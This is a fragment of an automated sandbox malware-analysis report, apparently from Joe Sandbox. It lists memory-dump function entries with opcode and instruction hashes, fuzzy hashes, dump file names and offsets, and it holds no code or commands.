                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59b1f57b0422b81140524a2da19811402536fee3ed781379064183ecc574fbf4
                                                          • Instruction ID: eea2cf4bb595a7516c40c88c5b6dc95a07d45b7ec29d31ee342276b563e26e71
                                                          • Opcode Fuzzy Hash: 59b1f57b0422b81140524a2da19811402536fee3ed781379064183ecc574fbf4
                                                          • Instruction Fuzzy Hash: 1CC02B3020150C8BDF501FF1FC1832A3B4CEB80225F0000A1F30DC2240DF35C400A921
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFD249 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9db570942ae28e261ce0db090e2433085dd40ca4c5110c9fcc5d5bb95caf674
                                                          • Instruction ID: ff7795f56b40ce02b385f1e87f429de4d13ecacad7f56ffd9103f227ec8f63fd
                                                          • Opcode Fuzzy Hash: e9db570942ae28e261ce0db090e2433085dd40ca4c5110c9fcc5d5bb95caf674
                                                          • Instruction Fuzzy Hash: 93C08C38A16700CFC768AB30C4010AABB25FFF2301B42FABF819095A54CBB684C1CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFDA80 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 364584ab5f9efbf2e19911d9aff4ff69969e337cad62c97bf1fc9b0d0387b0af
                                                          • Instruction ID: 8da80f43454022bf3a4a2ccb04ba5f249f2bb085866a175d56e6e8665aadcaad
                                                          • Opcode Fuzzy Hash: 364584ab5f9efbf2e19911d9aff4ff69969e337cad62c97bf1fc9b0d0387b0af
                                                          • Instruction Fuzzy Hash: F9C0123141060CCEC700BE68D40545CBF78BB55304B00811AE44916110EF21A199D791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%